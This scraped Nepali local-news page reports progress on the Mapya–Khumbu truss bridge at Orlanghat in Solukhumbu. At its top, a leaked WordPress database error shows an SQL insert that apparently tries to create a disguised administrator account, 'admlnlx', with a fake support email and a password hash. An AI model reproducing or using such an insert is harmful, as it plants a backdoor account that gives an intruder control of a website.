WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVaiGt3D1I.s2YX1EBQZGLNlR9Z9J80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:41:17', '', 'admlnlx', 'admlnlx')

ओर्लाङ्घाटमा निर्माणधिन माप्य–खुम्बु मितेरी ट्रस ब्रिजको काम तिब्र गतिमा – Gaule Khabar

ओर्लाङ्घाटमा निर्माणधिन माप्य–खुम्बु मितेरी ट्रस ब्रिजको काम तिब्र गतिमा

ओर्लाङ्घाटमा निर्माणधिन माप्य–खुम्बु मितेरी ट्रस ब्रिजको काम तिब्र गतिमा

गाउँले न्युज, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकाको ओर्लाङ्घाट स्थित दुधकोशी नदिमा निर्माणधिन माप्य–खुम्बु मितेरी ट्रस ब्रिजको काम तिब्र गतिमा भईरहेको छ ।
सगरमाथाको फेदिसम्मको सिधा यातायात सञ्चालनको लागि निर्मानाधिन माप्य–खुम्बु मितेरी ट्रस ब्रिजको काम ८० प्रतिशत भन्दा बढि सकिएको छ ।
माप्य दुधकोशी गाउँपालिका, खुम्बु पासाङ्ल्यमु गाउँलिका, प्रदेश सरकार र संघीय सरकारको संयुक्त लगानिमा निर्मानाधिन माप्य–खुम्बु मितेरी ट्रस ब्रिजको फाउण्डेशन उठाउने, पिलर ठढ्याउने र स्टिल राख्ने काम सम्पन्न भएको छ ।
गाउँपालिकाको गौरबको आयोजनाको रुपमा लिएको उक्त ट्रस ब्रिजको काम मौसम प्रतिकुलता र अहिले विश्वमा चलेको महामारी कोभिड १९ को लकडाउनको बाबजुद पनि समय सिमामानै सम्पन्न गर्ने गाउँपालिका अध्यक्ष बुद्धिकिरण राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका